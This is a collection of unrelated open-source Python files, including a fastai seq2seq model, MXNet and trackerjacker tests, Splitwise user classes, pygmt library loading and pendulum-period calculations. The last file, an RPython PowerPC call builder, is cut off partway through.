__all__ = ['build_dls', 'Seq2Seq']
def build_dls():
valid_jsons = [
{"from_txt":"Hello how are you?","to_txt":"I am doing fine."},
{"from_txt":"Is it going to rain today?","to_txt":"Let me pull up the weather."},
{"from_txt":"How do fastai DataBlocks work?","to_txt":"Not sure, I'm still learning."}
]
df_valid = pd.DataFrame(valid_jsons)
df_valid['is_valid'] = True
test_jsons = [
{"from_txt":"Hello, where is the closest McDonald's?","to_txt":"Let me find you that on Google Maps."},
{"from_txt":"Is it going to snow today?","to_txt":"Let me pull up the weather."},
{"from_txt":"How much coffee is safe to drink?","to_txt":"As much as you need to learn the Fastai Library."}
]
df_train = pd.DataFrame(test_jsons)
df_train['is_valid'] = False
df = pd.concat([df_train,df_valid], ignore_index=True)
logs = DataBlock(
# blocks specify what type of data we are going to be loading.
# In this case both are text files contained in the same df
# You can specify a tokenizer by passing in a tok variable. Comment the line above and ucomment the onces below.
blocks=(
TextBlock.from_df('from_txt', is_lm=False, tok=SubwordTokenizer(vocab_sz=200)),
TextBlock.from_df('to_txt' , is_lm=False, tok=SubwordTokenizer(vocab_sz=200))),
# The TestBlock tokenization process puts tokenized inputs into a column called text.
# The ColReader for get_x will always reference text, even if the original text inputs
# were in a column with another name in the dataframe.
get_x=ColReader('text'),
get_y=ColReader('text'),
# The dataframe needs to have a is_valid column for this to work.
splitter=ColSplitter()
)
return logs.dataloaders(df, bs=2)
class Encoder(nn.Module):
def __init__(self, input_dim, emb_dim, hid_dim, n_layers, dropout):
super().__init__()
self.hid_dim = hid_dim
self.n_layers = n_layers
self.embedding = nn.Embedding(input_dim, emb_dim)
self.rnn = nn.LSTM(emb_dim, hid_dim, n_layers, dropout = dropout)
self.dropout = nn.Dropout(dropout)
def forward(self, src):
#src = [src len, batch size]
embedded = self.dropout(self.embedding(src))
#embedded = [src len, batch size, emb dim]
outputs, (hidden, cell) = self.rnn(embedded)
#outputs = [src len, batch size, hid dim * n directions]
#hidden = [n layers * n directions, batch size, hid dim]
#cell = [n layers * n directions, batch size, hid dim]
#outputs are always from the top hidden layer
return hidden, cell
class Decoder(nn.Module):
def __init__(self, output_dim, emb_dim, hid_dim, n_layers, dropout):
super().__init__()
self.output_dim = output_dim
self.hid_dim = hid_dim
self.n_layers = n_layers
self.embedding = nn.Embedding(output_dim, emb_dim)
self.rnn = nn.LSTM(emb_dim, hid_dim, n_layers, dropout = dropout)
self.fc_out = nn.Linear(hid_dim, output_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, input, hidden, cell):
#input = [batch size]
#hidden = [n layers * n directions, batch size, hid dim]
#cell = [n layers * n directions, batch size, hid dim]
#n directions in the decoder will both always be 1, therefore:
#hidden = [n layers, batch size, hid dim]
#context = [n layers, batch size, hid dim]
input = input.unsqueeze(0)
#input = [1, batch size]
embedded = self.dropout(self.embedding(input))
#embedded = [1, batch size, emb dim]
output, (hidden, cell) = self.rnn(embedded, (hidden, cell))
#output = [seq len, batch size, hid dim * n directions]
#hidden = [n layers * n directions, batch size, hid dim]
#cell = [n layers * n directions, batch size, hid dim]
#seq len and n directions will always be 1 in the decoder, therefore:
#output = [1, batch size, hid dim]
#hidden = [n layers, batch size, hid dim]
#cell = [n layers, batch size, hid dim]
prediction = self.fc_out(output.squeeze(0))
#prediction = [batch size, output dim]
return prediction, hidden, cell
class Seq2Seq(nn.Module):
def __init__(self, encoder, decoder, device):
super().__init__()
self.encoder = encoder
self.decoder = decoder
self.device = device
assert encoder.hid_dim == decoder.hid_dim, \
"Hidden dimensions of encoder and decoder must be equal!"
assert encoder.n_layers == decoder.n_layers, \
"Encoder and decoder must have equal number of layers!"
def forward(self, src, trg, teacher_forcing_ratio = 0.5):
#src = [src len, batch size]
#trg = [trg len, batch size]
#teacher_forcing_ratio is probability to use teacher forcing
#e.g. if teacher_forcing_ratio is 0.75 we use ground-truth inputs 75% of the time
batch_size = trg.shape[1]
trg_len = trg.shape[0]
trg_vocab_size = self.decoder.output_dim
#tensor to store decoder outputs
outputs = torch.zeros(trg_len, batch_size, trg_vocab_size).to(self.device)
#last hidden state of the encoder is used as the initial hidden state of the decoder
hidden, cell = self.encoder(src)
#first input to the decoder is the <sos> tokens
input = trg[0,:]
for t in range(1, trg_len):
#insert input token embedding, previous hidden and previous cell states
#receive output tensor (predictions) and new hidden and cell states
output, hidden, cell = self.decoder(input, hidden, cell)
#place predictions in a tensor holding predictions for each token
outputs[t] = output
#decide if we are going to use teacher forcing or not
teacher_force = random.random() < teacher_forcing_ratio
#get the highest predicted token from our predictions
top1 = output.argmax(1)
#if teacher forcing, use actual next token as next input
#if not, use predicted token
input = trg[t] if teacher_force else top1
return outputs
|
tests/mxnet/mnist_gluon_model.py | sophiayue1116/sagemaker-debugger | 133 | 11086686 | # Using batch size 4 instead of 1024 decreases runtime from 35 secs to 4 secs.
# Standard Library
import time
# Third Party
import mxnet as mx
import numpy as np
from mxnet import autograd, gluon, init
from mxnet.gluon import nn
from mxnet.gluon.data.vision import datasets, transforms
# First Party
from smdebug import modes
def acc(output, label):
return (output.argmax(axis=1) == label.astype("float32")).mean().asscalar()
def run_mnist_gluon_model(
hook=None,
hybridize=False,
set_modes=False,
register_to_loss_block=False,
num_steps_train=None,
num_steps_eval=None,
make_input_zero=False,
normalize_mean=0.13,
normalize_std=0.31,
save_custom_tensor=False,
):
batch_size = 4
if make_input_zero:
mnist_train = datasets.FashionMNIST(
train=True, transform=lambda data, label: (data.astype(np.float32) * 0, label)
)
normalize_mean = 0.0
else:
mnist_train = datasets.FashionMNIST(train=True)
X, y = mnist_train[0]
("X shape: ", X.shape, "X dtype", X.dtype, "y:", y)
text_labels = [
"t-shirt",
"trouser",
"pullover",
"dress",
"coat",
"sandal",
"shirt",
"sneaker",
"bag",
"ankle boot",
]
X, y = mnist_train[0:10]
transformer = transforms.Compose(
[transforms.ToTensor(), transforms.Normalize(normalize_mean, 0.31)]
)
mnist_train = mnist_train.transform_first(transformer)
mnist_valid = gluon.data.vision.FashionMNIST(train=False)
train_data = gluon.data.DataLoader(
mnist_train, batch_size=batch_size, shuffle=True, num_workers=4
)
valid_data = gluon.data.DataLoader(
mnist_valid.transform_first(transformer), batch_size=batch_size, num_workers=4
)
# Create Model in Gluon
net = nn.HybridSequential()
net.add(
nn.Conv2D(channels=6, kernel_size=5, activation="relu"),
nn.MaxPool2D(pool_size=2, strides=2),
nn.Conv2D(channels=16, kernel_size=3, activation="relu"),
nn.MaxPool2D(pool_size=2, strides=2),
nn.Flatten(),
nn.Dense(120, activation="relu"),
nn.Dense(84, activation="relu"),
nn.Dense(10),
)
net.initialize(init=init.Xavier(), ctx=mx.cpu())
if hybridize:
net.hybridize(())
if hook is not None:
# Register the forward Hook
hook.register_hook(net)
softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(), "sgd", {"learning_rate": 0.1})
if register_to_loss_block:
hook.register_hook(softmax_cross_entropy)
if set_modes:
train_loss_name = eval_loss_name = "loss_scalar"
train_acc_name = eval_acc_name = "acc"
else:
train_loss_name = "train_loss_scalar"
eval_loss_name = "eval_loss_scalar"
train_acc_name = "train_acc"
eval_acc_name = "loss_acc"
# Start the training.
if save_custom_tensor:
hook.save_tensor("custom_tensor_1", mx.nd.array([1, 2, 3]))
for epoch in range(1):
train_loss, train_acc, valid_acc = 0.0, 0.0, 0.0
tic = time.time()
if set_modes:
hook.set_mode(modes.TRAIN)
i = 0
for data, label in train_data:
if save_custom_tensor:
hook.save_tensor("custom_tensor_2", mx.nd.array([1, 2, 3]))
data = data.as_in_context(mx.cpu(0))
# forward + backward
with autograd.record():
output = net(data)
loss = softmax_cross_entropy(output, label)
loss.backward()
# update parameters
trainer.step(batch_size)
# calculate training metrics
train_loss += loss.mean().asscalar()
train_acc += acc(output, label)
# hook.save_scalar(train_loss_name, train_loss)
# hook.save_scalar(train_acc_name, train_acc)
if save_custom_tensor:
# This tensor will not be added to default collections since
# collections have already been exported
hook.save_tensor("custom_tensor_3", mx.nd.array([1, 2, 3]))
i += 1
if num_steps_train is not None and i >= num_steps_train:
break
# calculate validation accuracy
if set_modes:
hook.set_mode(modes.EVAL)
i = 0
for data, label in valid_data:
data = data.as_in_context(mx.cpu(0))
val_output = net(data)
valid_acc += acc(val_output, label)
loss = softmax_cross_entropy(val_output, label)
# hook.save_tensor('eval_labels', label)
# hook.save_scalar(eval_acc_name, valid_acc)
# hook.save_scalar(eval_loss_name, loss)
i += 1
if num_steps_eval is not None and i >= num_steps_eval:
break
print(
"Epoch %d: loss %.3f, train acc %.3f, test acc %.3f, in %.1f sec"
% (
epoch,
train_loss / len(train_data),
train_acc / len(train_data),
valid_acc / len(valid_data),
time.time() - tic,
)
)
# for tests we have to call cleanup ourselves as destructor won't be called now
# hook._cleanup()
|
splitwise/user.py | aayaffe/splitwise | 105 | 11086702 | from splitwise.picture import Picture
from splitwise.balance import Balance
import splitwise.group as Group
class User(object):
""" Contains basic user data.
Attributes:
id(long, optional): ID of the user
first_name(str, optional): First name of the user
last_name(str, optional): Last name of the user
email(str, optional): Email of the user
registration_status(str, optional): Registration status of the user
picture(:obj:`splitwise.picture.Picture`, optional): Profile picture of the user
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing user object
"""
if data:
self.first_name = data["first_name"]
self.last_name = data["last_name"]
if 'id' in data:
self.id = data["id"]
else:
self.id = None
if 'email' in data:
self.email = data["email"]
else:
self.email = None
if 'registration_status' in data:
self.registration_status = data["registration_status"]
else:
self.registration_status = None
if 'picture' in data:
self.picture = Picture(data["picture"])
else:
self.picture = None
def getId(self):
""" Returns id of the user
Returns:
long: ID of the user
"""
return self.id
def getFirstName(self):
""" Returns first name of the user
Returns:
str: First name of the user
"""
return self.first_name
def getLastName(self):
""" Returns last name of the user
Returns:
str: Last name of the user
"""
return self.last_name
def getEmail(self):
""" Returns email of the user
Returns:
str: Email of the user
"""
return self.email
def getRegistrationStatus(self):
""" Returns registration status of the user
Returns:
str: Registration status of the user
"""
return self.registration_status
def getPicture(self):
""" Returns profile picture of the user
Returns:
:obj:`splitwise.picture.Picture`: Picture of the user
"""
return self.picture
def setFirstName(self, first_name):
""" Sets the first name of the user
Agrs:
first_name(str): First name of the user
"""
self.first_name = first_name
def setLastName(self, last_name):
""" Sets the last name of the user
Agrs:
last_name(str): Last name of the user
"""
self.last_name = last_name
def setEmail(self, email):
""" Sets the email of the user
Agrs:
email(str): Email of the user
"""
self.email = email
def setId(self, id):
""" Sets the id of the user
Agrs:
id(long): ID of the user
"""
self.id = id
def __getattr__(self, item):
return None
class CurrentUser(User):
""" Represents the current logged in user.
Inherits: :class:`splitwise.user.User`
Attributes:
default_currency(str, optional): Default Currency
locale(str, optional): Locale
date_format(str, optional): Date format used by the user
default_group_id(long, optional): User's default group id
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing current user object
"""
User.__init__(self, data)
self.default_currency = data["default_currency"]
self.locale = data["locale"]
self.date_format = data["date_format"]
self.default_group_id = data["default_group_id"]
def getDefaultCurrency(self):
""" Returns default currency of the user
Returns:
str: Default currency of the user
"""
return self.default_currency
def getLocale(self):
""" Returns locale of the user
Returns:
str: locale of the user
"""
return self.locale
def getDateFormat(self):
""" Returns Date format used by the user
Returns:
str: Date format used by the user
"""
return self.date_format
def getDefaultGroupId(self):
""" Returns default group id the user
Returns:
long: default group id the user
"""
return self.default_group_id
class Friend(User):
""" Represents a friend user.
Inherits: :class:`splitwise.user.User`
Attributes:
balances(:obj:`list` of :obj:`splitwise.balance.Balance`, optional): List of balances
groups(:obj:`list` of :obj:`splitwise.group.FriendGroup`, optional): List of groups
updated_at(str, optional): ISO 8601 Date time. The last updated date time of user
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing friend user object
"""
User.__init__(self, data)
if data:
if 'updated_at' in data:
self.updated_at = data["updated_at"]
else:
self.updated_at = None
self.balances = []
for balance in data["balance"]:
self.balances.append(Balance(balance))
self.groups = []
if "groups" in data:
for group in data["groups"]:
self.groups.append(Group.FriendGroup(group))
else:
self.groups = None
def getUpdatedAt(self):
""" Returns last updated date of the user
Returns:
str: last updated date of the user
"""
return self.updated_at
def getBalances(self):
""" Returns balances of the user
Returns:
:obj:`list` of :obj:`splitwise.balance.Balance`: List of balances
"""
return self.balances
def getGroups(self):
""" Returns balances of the user
Returns:
:obj:`list` of :obj:`splitwise.group.Group`: List of groups
"""
return self.groups
class ExpenseUser(User):
""" Represents a user in an expense.
Inherits: :class:`splitwise.user.User`
Attributes:
paid_share(str, optional): Paid share for the expense
owed_share(str, optional): Owed share for the expense
net_balance(str, optional): Net balance for the expense
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing user object
"""
if data:
User.__init__(self, data["user"])
self.paid_share = data["paid_share"]
self.owed_share = data["owed_share"]
self.net_balance = data["net_balance"]
def getPaidShare(self):
""" Returns paid share of the user
Returns:
str: paid share of the user
"""
return self.paid_share
def getOwedShare(self):
""" Returns owed share of the user
Returns:
str: owed share of the user
"""
return self.owed_share
def getNetBalance(self):
""" Returns net balance of the user
Returns:
str: net balance of the user
"""
return self.net_balance
def setPaidShare(self, paid_share):
""" Sets the paid share of the user
Args:
paid_share(str): Paid share share of the user
"""
self.paid_share = paid_share
def setOwedShare(self, owed_share):
""" Sets the owed share of the user
Args:
owed_share(str): Owed share share of the user
"""
self.owed_share = owed_share
|
tests/test_config_management.py | jakuta-tech/trackerjacker | 2,245 | 11086708 | # pylint: disable=C0111, C0413, C0103, E0401
import unittest
import trackerjacker.config_management as cm
class TestParseWatchList(unittest.TestCase):
def test_list_basic(self):
# Test basic MAC-only string
test1 = 'aa:bb:cc:dd:ee:ff'
parsed = cm.parse_command_line_watch_list(test1)
self.assertEqual(parsed, {'aa:bb:cc:dd:ee:ff': {'threshold': None, 'power': None}})
def test_2_macs(self):
test2 = 'aa:bb:cc:dd:ee:ff, 11:22:33:44:55:66'
parsed = cm.parse_command_line_watch_list(test2)
self.assertEqual(parsed, {'aa:bb:cc:dd:ee:ff': {'threshold': None, 'power': None},
'11:22:33:44:55:66': {'threshold': None, 'power': None}})
def test_2_macs_explicit(self):
""" Test 2 devices with explicitly setting threshold and power. """
test3 = 'aa:bb:cc:dd:ee:ff=1000, 11:22:33:44:55:66=-32'
parsed = cm.parse_command_line_watch_list(test3)
self.assertEqual(parsed, {'aa:bb:cc:dd:ee:ff': {'threshold': 1000, 'power': None},
'11:22:33:44:55:66': {'threshold': None, 'power': -32}})
class TestCommandLineBasics(unittest.TestCase):
def test_default_config(self):
# Just making sure I understand how parse_args works
cmd_line_args = cm.get_arg_parser().parse_args([])
self.assertEqual(cmd_line_args.do_map, False)
cmd_line_args = cm.get_arg_parser().parse_args(['--map'])
self.assertEqual(cmd_line_args.do_map, True)
# Test overriding the map_file
cmd_line_args = cm.get_arg_parser().parse_args([])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['map_file'], 'wifi_map.yaml')
def test_override_config(self):
cmd_line_args = cm.get_arg_parser().parse_args(['--map-file', 'my_network.yaml'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['map_file'], 'my_network.yaml')
def test_config_macs_to_watch_default_threshold_to_1(self):
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 1,
'power': None,}})
def test_config_macs_to_watch_explicit_threshold(self):
""" Test setting an explicit threshold. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=100'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 100,
'power': None}})
def test_config_macs_to_watch_explicit_threshold_multiple(self):
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=100,aa:bb:cc:dd:ee:ff'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 100,
'power': None},
'aa:bb:cc:dd:ee:ff': {'threshold': 1,
'power': None}})
def test_config_macs_to_watch_power_and_threshold(self):
""" Test setting power and threshold. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=100,aa:bb:cc:dd:ee:ff=-50'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 100,
'power': None},
'aa:bb:cc:dd:ee:ff': {'threshold': None,
'power': -50}})
def test_config_macs_to_watch_general_threshold(self):
""" Test that general threshold is used if no explicit specified. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21,aa:bb:cc:dd:ee:ff',
'--threshold', '1337'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 1337,
'power': None},
'aa:bb:cc:dd:ee:ff': {'threshold': 1337,
'power': None}})
class TestCommandLineGeneralPower(unittest.TestCase):
def test_config_macs_to_watch_power(self):
""" Test that general threshold is used if no explicit specified. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21,aa:bb:cc:dd:ee:ff',
'--power', '-42'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': None,
'power': -42},
'aa:bb:cc:dd:ee:ff': {'threshold': None,
'power': -42}})
class TestCommandLinePower(unittest.TestCase):
def test_config_macs_to_watch_mixed_override(self):
""" Test that we can have explicitly-set threshold and still get general power. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=123,aa:bb:cc:dd:ee:ff',
'--power', '-42'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 123,
'power': None},
'aa:bb:cc:dd:ee:ff': {'threshold': None,
'power': -42}})
class TestCommandLineExplicitPowerGeneralThreshold(unittest.TestCase):
def test_config_macs_to_watch_mixed_override_reverse(self):
""" Test that we can have explicitly-set power and still get general threshold. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=-22,11:bb:cc:dd:ee:ff',
'--threshold', '1024'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': None,
'power': -22},
'11:bb:cc:dd:ee:ff': {'threshold': 1024,
'power': None}})
class TestCommandLineApsToWatch(unittest.TestCase):
def test_config_aps_to_watch(self):
""" Test setting explicit threshold and power, and test ssid. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-a', '7C:70:BC:78:70:21=100,my_network'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['aps_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 100,
'power': None},
'my_network': {'threshold': 1,
'power': None}})
if __name__ == '__main__':
unittest.main()
|
pyshtools/constants/__init__.py | mjc87/SHTOOLS | 251 | 11086742 | """
pyshtools constants.
This subpackage defines several constants used in analyzing gravity,
topography, and magnetic field data of the terrestrial planets. The constants
are organized by planet, and each object is an astropy Constant that possesses
the attributes name, value, unit, uncertainty, and reference. These constants
can be used in arithmetic operations with objects of the astropy class
Quantity.
Examples
Calculate the gravitational acceleration on the surface of Mars and
then to convert this to mGals:
>>> Mars.gm / Mars.r**2
<Quantity 3.7278663 m / s2>
>>> (Mars.gm / Mars.r**2).to_value('mGal')
372786.6303857397
Inspect a constant using the print function:
>>> print(G)
Name = Gravitational constant
Value = 6.6743e-11
Uncertainty = 1.5e-15
Unit = m3 / (kg s2)
Reference = CODATA 2018
"""
try:
from astropy.constants import Constant
from astropy.units.quantity import Quantity
except ImportError:
raise ImportError('To use the pyshtools constant subpackage, you must '
'install astropy.')
# == Fundamental constants ==
from astropy.constants import G
from astropy.constants import mu0
from astropy.constants import codata
# == Constants organized by planet ===
from . import Mercury
from . import Venus
from . import Earth
from . import Moon
from . import Mars
# === Define __all__ ===
__all__ = ['Constant', 'Quantity', 'G', 'mu0', 'codata', 'Mercury', 'Venus',
'Earth', 'Moon', 'Mars']
|
recipes/Python/580733_Reverse_sequence_annotations_PDF/recipe-580733.py | tdiprima/code | 2,023 | 11086754 | <reponame>tdiprima/code
import fitz
doc = fitz.open("some.pdf") # open pdf
page = doc[n] # open the page (0-based number)
rtab = [] # store all rectangles here
annot = page.firstAnnot # read first annotation
while annot:
rtab.append(annot.rect) # store rectangle
annot = annot.next # read next annot
annot = page.firstAnnot # cycle thru annots again
for rect in reversed(rtab):
annot.setRect(rect) # give it a new place
annot = annot.next
doc.save("some-reversed.pdf") # save PDF with reversed annotations
|
corehq/apps/users/migrations/0020_user_staging_pk_to_bigint.py | dimagilg/commcare-hq | 471 | 11086771 | # Generated by Django 2.2.13 on 2020-07-27 11:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0019_editreportspermissions'),
]
operations = [
migrations.AlterField(
model_name='userreportingmetadatastaging',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
]
|
build/scripts/extract_jacoco_report.py | HeyLey/catboost | 6,989 | 11086784 | <filename>build/scripts/extract_jacoco_report.py
import argparse
import os
import re
import tarfile
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--archive', action='store')
parser.add_argument('--source-re', action='store')
parser.add_argument('--destination', action='store')
args = parser.parse_args()
with tarfile.open(args.archive) as tf:
open(args.destination, 'wb').close()
extract_list = []
matcher = re.compile(args.source_re)
temp_dir = os.path.join(os.path.dirname(args.destination), 'temp_profiles')
if not os.path.exists(temp_dir):
os.makedirs(temp_dir)
for f in [i for i in tf if matcher.match(i.name)]:
tf.extract(f, path=temp_dir)
for directory, _, srcs in os.walk(temp_dir):
for f in srcs:
with open(args.destination, 'ab') as dst:
with open(os.path.join(temp_dir, directory, f), 'rb') as src:
dst.write(src.read())
|
postprocessing/CalculateFrequency.py | mathreader/DeepKoopman | 199 | 11086795 | <gh_stars>100-1000
import numpy as np
from scipy.special import factorial2
from scipy.special import factorial
def kfn(theta0):
return np.sin(np.float64(theta0) / 2)
def periodTerm(n, k):
numerator = np.float64((factorial2(2 * n - 1)) ** 2)
denominator = np.float64((2 ** n) * factorial(n) * factorial2(2 * n))
return (numerator / denominator) * (k ** (2 * n)) * (2 * np.pi)
def periodTermNextStep(n, k, prevTerm):
nextTerm = ((2 * n - 1) ** 2) * prevTerm / (4 * n ** 2) * k ** 2
return nextTerm
def periodPendulum(theta0, tol, maxN, printFlag=0):
periodApprox = 2 * np.pi # n = 0 term
k = kfn(theta0)
for n in (np.arange(maxN) + 1): # n = 1, 2, ..., maxN
if n < 3:
nextTerm = periodTerm(n, k)
else:
# nextTermOldFormula = periodTerm(n, k)
nextTerm = periodTermNextStep(n, k, prevTerm)
# if (np.abs(nextTermOldFormula - nextTerm) > 10**(-10)):
# print "discrepancy at n = %f, k = %f: prev. formula said nextTerm = %f, new formula says nextTerm = %f" % (n, k, nextTermOldFormula, nextTerm)
if nextTerm < 0:
print("nextTerm < 0: %f at n = %f, k = %f" % (nextTerm, n, k))
if nextTerm > tol: # nextTerm gives sense of error (really, lower bound, since all terms are non-neg)
periodApprox += nextTerm
else:
if printFlag:
print("reached tol (lower bound on error) after n = %d" % (n - 1))
break
prevTerm = nextTerm.copy()
return periodApprox
def FindTheta0(theta, thetadot):
# print "find theta0 for theta = %f and thetadot = %f" % (theta, thetadot)
potential = (1.0 / 2.0) * (thetadot ** 2) - np.cos(theta) + 1 # H
# E = 1 - np.cos(theta0)
# domain for real #s for arrcos is [-1,1]
# so want 1-potential in [-1, 1]
# so want potential in [0, 2]
if ((potential < 0) or (potential > 2)):
# TODO: do something smarter here
potential = 0
theta0 = np.arccos(1 - potential)
return theta0
# def f(t, x):
# return [x[1], -np.sin(x[0])]
def FindOmega(point, tol=10 ** (-7), maxTerms=100):
theta0 = FindTheta0(point[0], point[1])
period = periodPendulum(theta0, tol, maxTerms)
omega = (2 * np.pi) / period
# eigenval = np.exp(omega*1j*deltat)
return omega
def AddFrequency(prefix, suffix, tol=10 ** (-7), maxTerms=100):
fname = prefix + suffix
print("loading %s" % fname)
data = np.loadtxt(fname, delimiter=',')
# each row is an example, we add extra column
data_freq = np.zeros((data.shape[0], data.shape[1] + 1), dtype=np.float32)
data_freq[:, 0:2] = data.copy()
for j in range(data.shape[0]):
data_freq[j, 2] = FindOmega(data[j, 0:2])
newfname = prefix + 'Freq' + suffix
print("saving %s" % newfname)
np.savetxt(newfname, data_freq, delimiter=',')
|
pygmt/clib/loading.py | jbusecke/pygmt | 326 | 11086798 | """
Utility functions to load libgmt as ctypes.CDLL.
The path to the shared library can be found automatically by ctypes or set
through the GMT_LIBRARY_PATH environment variable.
"""
import ctypes
import os
import subprocess as sp
import sys
from ctypes.util import find_library
from pathlib import Path
from pygmt.exceptions import GMTCLibError, GMTCLibNotFoundError, GMTOSError
def load_libgmt(lib_fullnames=None):
"""
Find and load ``libgmt`` as a :py:class:`ctypes.CDLL`.
Will look for the GMT shared library in the directories determined by
clib_full_names().
Parameters
----------
lib_fullnames : list of str or None
List of possible full names of GMT's shared library. If ``None``, will
default to ``clib_full_names()``.
Returns
-------
:py:class:`ctypes.CDLL` object
The loaded shared library.
Raises
------
GMTCLibNotFoundError
If there was any problem loading the library (couldn't find it or
couldn't access the functions).
"""
if lib_fullnames is None:
lib_fullnames = clib_full_names()
error = True
error_msg = []
failing_libs = []
for libname in lib_fullnames:
try:
if libname not in failing_libs: # skip the lib if it's known to fail
libgmt = ctypes.CDLL(libname)
check_libgmt(libgmt)
error = False
break
except (OSError, GMTCLibError) as err:
error_msg.append(f"Error loading GMT shared library at '{libname}'.\n{err}")
failing_libs.append(libname)
if error:
raise GMTCLibNotFoundError("\n".join(error_msg))
return libgmt
def clib_names(os_name):
"""
Return the name of GMT's shared library for the current OS.
Parameters
----------
os_name : str
The operating system name as given by ``sys.platform``.
Returns
-------
libnames : list of str
List of possible names of GMT's shared library.
"""
if os_name.startswith(("linux", "freebsd")):
libnames = ["libgmt.so"]
elif os_name == "darwin": # Darwin is macOS
libnames = ["libgmt.dylib"]
elif os_name == "win32":
libnames = ["gmt.dll", "gmt_w64.dll", "gmt_w32.dll"]
else:
raise GMTOSError(f"Operating system '{os_name}' not supported.")
return libnames
def clib_full_names(env=None):
"""
Return the full path of GMT's shared library for the current OS.
Parameters
----------
env : dict or None
A dictionary containing the environment variables. If ``None``, will
default to ``os.environ``.
Yields
------
lib_fullnames: list of str
List of possible full names of GMT's shared library.
"""
if env is None:
env = os.environ
libnames = clib_names(os_name=sys.platform) # e.g. libgmt.so, libgmt.dylib, gmt.dll
# Search for the library in different ways, sorted by priority.
# 1. Search for the library in GMT_LIBRARY_PATH if defined.
libpath = env.get("GMT_LIBRARY_PATH", "") # e.g. $HOME/miniconda/envs/pygmt/lib
if libpath:
for libname in libnames:
libfullpath = Path(libpath) / libname
if libfullpath.exists():
yield str(libfullpath)
# 2. Search for the library returned by command "gmt --show-library"
# Use `str(Path(realpath))` to avoid mixture of separators "\\" and "/"
try:
libfullpath = Path(
sp.check_output(["gmt", "--show-library"], encoding="utf-8").rstrip("\n")
)
assert libfullpath.exists()
yield str(libfullpath)
except (FileNotFoundError, AssertionError, sp.CalledProcessError):
# the 'gmt' executable is not found
# the gmt library is not found
# the 'gmt' executable is broken
pass
# 3. Search for DLLs in PATH by calling find_library() (Windows only)
if sys.platform == "win32":
for libname in libnames:
libfullpath = find_library(libname)
if libfullpath:
yield libfullpath
# 4. Search for library names in the system default path
for libname in libnames:
yield libname
def check_libgmt(libgmt):
"""
Make sure that libgmt was loaded correctly.
Checks if it defines some common required functions.
Does nothing if everything is fine. Raises an exception if any of the
functions are missing.
Parameters
----------
libgmt : :py:class:`ctypes.CDLL`
A shared library loaded using ctypes.
Raises
------
GMTCLibError
"""
# Check if a few of the functions we need are in the library
functions = ["Create_Session", "Get_Enum", "Call_Module", "Destroy_Session"]
for func in functions:
if not hasattr(libgmt, "GMT_" + func):
# pylint: disable=protected-access
msg = (
f"Error loading '{libgmt._name}'. Couldn't access function GMT_{func}. "
"Ensure that you have installed an up-to-date GMT version 6 library. "
"Please set the environment variable 'GMT_LIBRARY_PATH' to the "
"directory of the GMT 6 library."
)
raise GMTCLibError(msg)
|
utils/timeout.py | Mattlk13/dd-agent | 1,172 | 11086822 | <gh_stars>1000+
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
from datadog_checks.utils.timeout import ( # noqa F401
TimeoutException,
ThreadMethod,
timeout
)
|
rpython/jit/backend/ppc/callbuilder.py | m4sterchain/mesapy | 381 | 11086830 | <gh_stars>100-1000
from rpython.jit.backend.ppc.arch import IS_PPC_64, WORD, PARAM_SAVE_AREA_OFFSET
from rpython.jit.backend.ppc.arch import THREADLOCAL_ADDR_OFFSET
import rpython.jit.backend.ppc.register as r
from rpython.jit.metainterp.history import INT, FLOAT
from rpython.jit.backend.llsupport.callbuilder import AbstractCallBuilder
from rpython.jit.backend.ppc.jump import remap_frame_layout
from rpython.rlib.objectmodel import we_are_translated
from rpython.jit.backend.llsupport import llerrno
from rpython.rtyper.lltypesystem import rffi
def follow_jump(addr):
# xxx implement me
return addr
class CallBuilder(AbstractCallBuilder):
GPR_ARGS = [r.r3, r.r4, r.r5, r.r6, r.r7, r.r8, r.r9, r.r10]
FPR_ARGS = r.MANAGED_FP_REGS
assert FPR_ARGS == [r.f1, r.f2, r.f3, r.f4, r.f5, r.f6, r.f7,
